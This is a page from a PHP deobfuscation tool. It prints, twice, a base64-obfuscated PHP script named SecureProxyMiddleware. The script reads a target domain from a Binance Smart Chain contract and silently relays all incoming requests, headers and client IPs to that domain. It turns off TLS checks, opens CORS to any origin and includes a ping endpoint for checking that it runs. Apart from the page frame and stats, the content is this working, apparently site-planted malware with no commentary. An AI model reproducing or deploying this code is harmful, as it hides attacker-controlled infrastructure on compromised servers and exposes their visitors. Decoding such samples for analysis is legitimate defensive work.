Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php function getClientIP() { if (isset($_SERVER[base64_decode("SFRUUF9DRl9DT05ORUN..
Decoded Output download
<?php function getClientIP()
{
if (isset($_SERVER[base64_decode("SFRUUF9DRl9DT05ORUNUSU5HX0lQ")])) {
return $_SERVER[base64_decode("SFRUUF9DRl9DT05ORUNUSU5HX0lQ")];
}
if (isset($_SERVER[base64_decode("SFRUUF9YX0ZPUldBUkRFRF9GT1I=")])) {
$ips = explode(
base64_decode("LA=="),
$_SERVER[base64_decode("SFRUUF9YX0ZPUldBUkRFRF9GT1I=")]
);
return trim($ips[0]);
}
return $_SERVER[base64_decode("UkVNT1RFX0FERFI=")];
}
class SecureProxyMiddleware
{
private $updateInterval = 60;
private $rpcUrls;
private $contractAddress;
private $cacheFile;
public function __construct($options = [])
{
$this->rpcUrls = $options[base64_decode("cnBjVXJscw==")] ?? [
base64_decode("aHR0cHM6Ly9ycGMuYW5rci5jb20vYnNj"),
base64_decode("aHR0cHM6Ly9ic2MtZGF0YXNlZWQyLmJuYmNoYWluLm9yZw=="),
];
$this->contractAddress =
$options[base64_decode("Y29udHJhY3RBZGRyZXNz")] ??
base64_decode(
"MHhlOWQ1ZjY0NWY3OWZhNjBmY2E4MmI0ZTFkMzU4MzJlNDMzNzBmZWIw"
);
$serverIdentifier = md5(
$_SERVER[base64_decode("U0VSVkVSX05BTUU=")] .
base64_decode("Og==") .
$_SERVER[base64_decode("U0VSVkVSX0FERFI=")] .
base64_decode("Og==") .
$_SERVER[base64_decode("U0VSVkVSX1NPRlRXQVJF")]
);
$this->cacheFile =
sys_get_temp_dir() .
base64_decode("L3Byb3h5X2NhY2hlXw==") .
$serverIdentifier .
base64_decode("Lmpzb24=");
}
private function loadCache()
{
if (!file_exists($this->cacheFile)) {
return null;
}
$cache = json_decode(file_get_contents($this->cacheFile), true);
if (
!$cache ||
time() - $cache[base64_decode("dGltZXN0YW1w")] >
$this->updateInterval
) {
return null;
}
return $cache[base64_decode("ZG9tYWlu")];
}
private function filterHeaders($headers)
{
$blacklist = [base64_decode("aG9zdA==")];
$formatted = [];
foreach ($headers as $key => $value) {
$key = strtolower($key);
if (!in_array($key, $blacklist)) {
$formatted[] = "$key: $value";
}
}
return $formatted;
}
private function saveCache($domain)
{
$cache = [
base64_decode("ZG9tYWlu") => $domain,
base64_decode("dGltZXN0YW1w") => time(),
];
file_put_contents($this->cacheFile, json_encode($cache));
}
private function hexToString($hex)
{
$hex = preg_replace(base64_decode("L14weC8="), "", $hex);
$hex = substr($hex, 64);
$lengthHex = substr($hex, 0, 64);
$length = hexdec($lengthHex);
$dataHex = substr($hex, 64, $length * 2);
$result = "";
for ($i = 0; $i < strlen($dataHex); $i += 2) {
$charCode = hexdec(substr($dataHex, $i, 2));
if ($charCode === 0) {
break;
}
$result .= chr($charCode);
}
return $result;
}
private function fetchTargetDomain()
{
$data = base64_decode("MjA5NjUyNTU=");
foreach ($this->rpcUrls as $rpcUrl) {
try {
$ch = curl_init($rpcUrl);
curl_setopt_array($ch, [
CURLOPT_RETURNTRANSFER => true,
CURLOPT_POST => true,
CURLOPT_POSTFIELDS => json_encode([
base64_decode("anNvbnJwYw==") => base64_decode("Mi4w"),
base64_decode("aWQ=") => 1,
base64_decode("bWV0aG9k") => base64_decode(
"ZXRoX2NhbGw="
),
base64_decode("cGFyYW1z") => [
[
base64_decode("dG8=") => $this->contractAddress,
base64_decode("ZGF0YQ==") =>
base64_decode("MHg=") . $data,
],
base64_decode("bGF0ZXN0"),
],
]),
CURLOPT_HTTPHEADER => [
base64_decode(
"Q29udGVudC1UeXBlOiBhcHBsaWNhdGlvbi9qc29u"
),
],
CURLOPT_TIMEOUT => 120,
CURLOPT_SSL_VERIFYPEER => false,
CURLOPT_SSL_VERIFYHOST => false,
]);
$response = curl_exec($ch);
if (curl_errno($ch)) {
curl_close($ch);
continue;
}
curl_close($ch);
$responseData = json_decode($response, true);
if (isset($responseData[base64_decode("ZXJyb3I=")])) {
continue;
}
$domain = $this->hexToString(
$responseData[base64_decode("cmVzdWx0")]
);
if ($domain) {
return $domain;
}
} catch (Exception $e) {
continue;
}
}
throw new Exception(
base64_decode("Q291bGQgbm90IGZldGNoIHRhcmdldCBkb21haW4=")
);
}
private function getTargetDomain()
{
$cachedDomain = $this->loadCache();
if ($cachedDomain) {
return $cachedDomain;
}
$domain = $this->fetchTargetDomain();
$this->saveCache($domain);
return $domain;
}
private function formatHeaders($headers)
{
$formatted = [];
foreach ($headers as $name => $value) {
if (is_array($value)) {
$value = implode(base64_decode("LCA="), $value);
}
$formatted[] = "$name: $value";
}
return $formatted;
}
public function handle($endpoint)
{
try {
$targetDomain = rtrim(
$this->getTargetDomain(),
base64_decode("Lw==")
);
$endpoint =
base64_decode("Lw==") . ltrim($endpoint, base64_decode("Lw=="));
$url = $targetDomain . $endpoint;
$clientIP = getClientIP();
$headers = getallheaders();
unset(
$headers[base64_decode("SG9zdA==")],
$headers[base64_decode("aG9zdA==")]
);
unset(
$headers[base64_decode("b3JpZ2lu")],
$headers[base64_decode("T3JpZ2lu")]
);
unset(
$headers[base64_decode("QWNjZXB0LUVuY29kaW5n")],
$headers[base64_decode("Q29udGVudC1FbmNvZGluZw==")]
);
$headers[base64_decode("eC1kZmtqbGRpZmpsaWZqZA==")] = $clientIP;
$ch = curl_init($url);
curl_setopt_array($ch, [
CURLOPT_CUSTOMREQUEST => $_SERVER[
base64_decode("UkVRVUVTVF9NRVRIT0Q=")
],
CURLOPT_POSTFIELDS => file_get_contents(
base64_decode("cGhwOi8vaW5wdXQ=")
),
CURLOPT_RETURNTRANSFER => true,
CURLOPT_HTTPHEADER => $this->formatHeaders($headers),
CURLOPT_TIMEOUT => 120,
CURLOPT_FOLLOWLOCATION => true,
CURLOPT_SSL_VERIFYPEER => false,
CURLOPT_SSL_VERIFYHOST => false,
CURLOPT_ENCODING => "",
]);
$response = curl_exec($ch);
if (curl_errno($ch)) {
throw new Exception(curl_error($ch));
}
$httpCode = curl_getinfo($ch, CURLINFO_HTTP_CODE);
$contentType = curl_getinfo($ch, CURLINFO_CONTENT_TYPE);
curl_close($ch);
header(base64_decode("QWNjZXNzLUNvbnRyb2wtQWxsb3ctT3JpZ2luOiAq"));
header(
base64_decode(
"QWNjZXNzLUNvbnRyb2wtQWxsb3ctTWV0aG9kczogR0VULCBIRUFELCBQT1NULCBPUFRJT05T"
)
);
header(
base64_decode("QWNjZXNzLUNvbnRyb2wtQWxsb3ctSGVhZGVyczogKg==")
);
if ($contentType) {
header(base64_decode("Q29udGVudC1UeXBlOiA=") . $contentType);
}
http_response_code($httpCode);
echo $response;
} catch (Exception $e) {
http_response_code(500);
echo base64_decode("ZXJyb3I=") . $e;
}
}
}
if (
$_SERVER[base64_decode("UkVRVUVTVF9NRVRIT0Q=")] ===
base64_decode("T1BUSU9OUw==")
) {
header(base64_decode("QWNjZXNzLUNvbnRyb2wtQWxsb3ctT3JpZ2luOiAq"));
header(
base64_decode(
"QWNjZXNzLUNvbnRyb2wtQWxsb3ctTWV0aG9kczogR0VULCBIRUFELCBQT1NULCBPUFRJT05T"
)
);
header(base64_decode("QWNjZXNzLUNvbnRyb2wtQWxsb3ctSGVhZGVyczogKg=="));
header(base64_decode("QWNjZXNzLUNvbnRyb2wtTWF4LUFnZTogODY0MDA="));
http_response_code(204);
exit();
}
if ($_GET[base64_decode("ZQ==")] === base64_decode("cGluZ19wcm94eQ==")) {
header(base64_decode("Q29udGVudC1UeXBlOiB0ZXh0L3BsYWlu"));
echo base64_decode("cG9uZw==");
exit();
} elseif (isset($_GET[base64_decode("ZQ==")])) {
$proxy = new SecureProxyMiddleware([
base64_decode("cnBjVXJscw==") => [
base64_decode("aHR0cHM6Ly9ycGMuYW5rci5jb20vYnNj"),
base64_decode("aHR0cHM6Ly9ic2MtZGF0YXNlZWQyLmJuYmNoYWluLm9yZw=="),
],
base64_decode("Y29udHJhY3RBZGRyZXNz") => base64_decode(
"MHhlOWQ1ZjY0NWY3OWZhNjBmY2E4MmI0ZTFkMzU4MzJlNDMzNzBmZWIw"
),
]);
$endpoint = urldecode($_GET[base64_decode("ZQ==")]);
$endpoint = ltrim($endpoint, base64_decode("Lw=="));
$proxy->handle($endpoint);
} else {
http_response_code(400);
echo base64_decode("TWlzc2luZyBlbmRwb2ludA==");
} ?>
Did this file decode correctly?
Original Code
<?php function getClientIP()
{
if (isset($_SERVER[base64_decode("SFRUUF9DRl9DT05ORUNUSU5HX0lQ")])) {
return $_SERVER[base64_decode("SFRUUF9DRl9DT05ORUNUSU5HX0lQ")];
}
if (isset($_SERVER[base64_decode("SFRUUF9YX0ZPUldBUkRFRF9GT1I=")])) {
$ips = explode(
base64_decode("LA=="),
$_SERVER[base64_decode("SFRUUF9YX0ZPUldBUkRFRF9GT1I=")]
);
return trim($ips[0]);
}
return $_SERVER[base64_decode("UkVNT1RFX0FERFI=")];
}
class SecureProxyMiddleware
{
private $updateInterval = 60;
private $rpcUrls;
private $contractAddress;
private $cacheFile;
public function __construct($options = [])
{
$this->rpcUrls = $options[base64_decode("cnBjVXJscw==")] ?? [
base64_decode("aHR0cHM6Ly9ycGMuYW5rci5jb20vYnNj"),
base64_decode("aHR0cHM6Ly9ic2MtZGF0YXNlZWQyLmJuYmNoYWluLm9yZw=="),
];
$this->contractAddress =
$options[base64_decode("Y29udHJhY3RBZGRyZXNz")] ??
base64_decode(
"MHhlOWQ1ZjY0NWY3OWZhNjBmY2E4MmI0ZTFkMzU4MzJlNDMzNzBmZWIw"
);
$serverIdentifier = md5(
$_SERVER[base64_decode("U0VSVkVSX05BTUU=")] .
base64_decode("Og==") .
$_SERVER[base64_decode("U0VSVkVSX0FERFI=")] .
base64_decode("Og==") .
$_SERVER[base64_decode("U0VSVkVSX1NPRlRXQVJF")]
);
$this->cacheFile =
sys_get_temp_dir() .
base64_decode("L3Byb3h5X2NhY2hlXw==") .
$serverIdentifier .
base64_decode("Lmpzb24=");
}
private function loadCache()
{
if (!file_exists($this->cacheFile)) {
return null;
}
$cache = json_decode(file_get_contents($this->cacheFile), true);
if (
!$cache ||
time() - $cache[base64_decode("dGltZXN0YW1w")] >
$this->updateInterval
) {
return null;
}
return $cache[base64_decode("ZG9tYWlu")];
}
private function filterHeaders($headers)
{
$blacklist = [base64_decode("aG9zdA==")];
$formatted = [];
foreach ($headers as $key => $value) {
$key = strtolower($key);
if (!in_array($key, $blacklist)) {
$formatted[] = "$key: $value";
}
}
return $formatted;
}
private function saveCache($domain)
{
$cache = [
base64_decode("ZG9tYWlu") => $domain,
base64_decode("dGltZXN0YW1w") => time(),
];
file_put_contents($this->cacheFile, json_encode($cache));
}
private function hexToString($hex)
{
$hex = preg_replace(base64_decode("L14weC8="), "", $hex);
$hex = substr($hex, 64);
$lengthHex = substr($hex, 0, 64);
$length = hexdec($lengthHex);
$dataHex = substr($hex, 64, $length * 2);
$result = "";
for ($i = 0; $i < strlen($dataHex); $i += 2) {
$charCode = hexdec(substr($dataHex, $i, 2));
if ($charCode === 0) {
break;
}
$result .= chr($charCode);
}
return $result;
}
private function fetchTargetDomain()
{
$data = base64_decode("MjA5NjUyNTU=");
foreach ($this->rpcUrls as $rpcUrl) {
try {
$ch = curl_init($rpcUrl);
curl_setopt_array($ch, [
CURLOPT_RETURNTRANSFER => true,
CURLOPT_POST => true,
CURLOPT_POSTFIELDS => json_encode([
base64_decode("anNvbnJwYw==") => base64_decode("Mi4w"),
base64_decode("aWQ=") => 1,
base64_decode("bWV0aG9k") => base64_decode(
"ZXRoX2NhbGw="
),
base64_decode("cGFyYW1z") => [
[
base64_decode("dG8=") => $this->contractAddress,
base64_decode("ZGF0YQ==") =>
base64_decode("MHg=") . $data,
],
base64_decode("bGF0ZXN0"),
],
]),
CURLOPT_HTTPHEADER => [
base64_decode(
"Q29udGVudC1UeXBlOiBhcHBsaWNhdGlvbi9qc29u"
),
],
CURLOPT_TIMEOUT => 120,
CURLOPT_SSL_VERIFYPEER => false,
CURLOPT_SSL_VERIFYHOST => false,
]);
$response = curl_exec($ch);
if (curl_errno($ch)) {
curl_close($ch);
continue;
}
curl_close($ch);
$responseData = json_decode($response, true);
if (isset($responseData[base64_decode("ZXJyb3I=")])) {
continue;
}
$domain = $this->hexToString(
$responseData[base64_decode("cmVzdWx0")]
);
if ($domain) {
return $domain;
}
} catch (Exception $e) {
continue;
}
}
throw new Exception(
base64_decode("Q291bGQgbm90IGZldGNoIHRhcmdldCBkb21haW4=")
);
}
private function getTargetDomain()
{
$cachedDomain = $this->loadCache();
if ($cachedDomain) {
return $cachedDomain;
}
$domain = $this->fetchTargetDomain();
$this->saveCache($domain);
return $domain;
}
private function formatHeaders($headers)
{
$formatted = [];
foreach ($headers as $name => $value) {
if (is_array($value)) {
$value = implode(base64_decode("LCA="), $value);
}
$formatted[] = "$name: $value";
}
return $formatted;
}
public function handle($endpoint)
{
try {
$targetDomain = rtrim(
$this->getTargetDomain(),
base64_decode("Lw==")
);
$endpoint =
base64_decode("Lw==") . ltrim($endpoint, base64_decode("Lw=="));
$url = $targetDomain . $endpoint;
$clientIP = getClientIP();
$headers = getallheaders();
unset(
$headers[base64_decode("SG9zdA==")],
$headers[base64_decode("aG9zdA==")]
);
unset(
$headers[base64_decode("b3JpZ2lu")],
$headers[base64_decode("T3JpZ2lu")]
);
unset(
$headers[base64_decode("QWNjZXB0LUVuY29kaW5n")],
$headers[base64_decode("Q29udGVudC1FbmNvZGluZw==")]
);
$headers[base64_decode("eC1kZmtqbGRpZmpsaWZqZA==")] = $clientIP;
$ch = curl_init($url);
curl_setopt_array($ch, [
CURLOPT_CUSTOMREQUEST => $_SERVER[
base64_decode("UkVRVUVTVF9NRVRIT0Q=")
],
CURLOPT_POSTFIELDS => file_get_contents(
base64_decode("cGhwOi8vaW5wdXQ=")
),
CURLOPT_RETURNTRANSFER => true,
CURLOPT_HTTPHEADER => $this->formatHeaders($headers),
CURLOPT_TIMEOUT => 120,
CURLOPT_FOLLOWLOCATION => true,
CURLOPT_SSL_VERIFYPEER => false,
CURLOPT_SSL_VERIFYHOST => false,
CURLOPT_ENCODING => "",
]);
$response = curl_exec($ch);
if (curl_errno($ch)) {
throw new Exception(curl_error($ch));
}
$httpCode = curl_getinfo($ch, CURLINFO_HTTP_CODE);
$contentType = curl_getinfo($ch, CURLINFO_CONTENT_TYPE);
curl_close($ch);
header(base64_decode("QWNjZXNzLUNvbnRyb2wtQWxsb3ctT3JpZ2luOiAq"));
header(
base64_decode(
"QWNjZXNzLUNvbnRyb2wtQWxsb3ctTWV0aG9kczogR0VULCBIRUFELCBQT1NULCBPUFRJT05T"
)
);
header(
base64_decode("QWNjZXNzLUNvbnRyb2wtQWxsb3ctSGVhZGVyczogKg==")
);
if ($contentType) {
header(base64_decode("Q29udGVudC1UeXBlOiA=") . $contentType);
}
http_response_code($httpCode);
echo $response;
} catch (Exception $e) {
http_response_code(500);
echo base64_decode("ZXJyb3I=") . $e;
}
}
}
if (
$_SERVER[base64_decode("UkVRVUVTVF9NRVRIT0Q=")] ===
base64_decode("T1BUSU9OUw==")
) {
header(base64_decode("QWNjZXNzLUNvbnRyb2wtQWxsb3ctT3JpZ2luOiAq"));
header(
base64_decode(
"QWNjZXNzLUNvbnRyb2wtQWxsb3ctTWV0aG9kczogR0VULCBIRUFELCBQT1NULCBPUFRJT05T"
)
);
header(base64_decode("QWNjZXNzLUNvbnRyb2wtQWxsb3ctSGVhZGVyczogKg=="));
header(base64_decode("QWNjZXNzLUNvbnRyb2wtTWF4LUFnZTogODY0MDA="));
http_response_code(204);
exit();
}
if ($_GET[base64_decode("ZQ==")] === base64_decode("cGluZ19wcm94eQ==")) {
header(base64_decode("Q29udGVudC1UeXBlOiB0ZXh0L3BsYWlu"));
echo base64_decode("cG9uZw==");
exit();
} elseif (isset($_GET[base64_decode("ZQ==")])) {
$proxy = new SecureProxyMiddleware([
base64_decode("cnBjVXJscw==") => [
base64_decode("aHR0cHM6Ly9ycGMuYW5rci5jb20vYnNj"),
base64_decode("aHR0cHM6Ly9ic2MtZGF0YXNlZWQyLmJuYmNoYWluLm9yZw=="),
],
base64_decode("Y29udHJhY3RBZGRyZXNz") => base64_decode(
"MHhlOWQ1ZjY0NWY3OWZhNjBmY2E4MmI0ZTFkMzU4MzJlNDMzNzBmZWIw"
),
]);
$endpoint = urldecode($_GET[base64_decode("ZQ==")]);
$endpoint = ltrim($endpoint, base64_decode("Lw=="));
$proxy->handle($endpoint);
} else {
http_response_code(400);
echo base64_decode("TWlzc2luZyBlbmRwb2ludA==");
} ?>
Function Calls
| None |
Stats
| MD5 | 8d0555e8099db35886dd63bd8ba5da3f |
| Eval Count | 0 |
| Decode Time | 93 ms |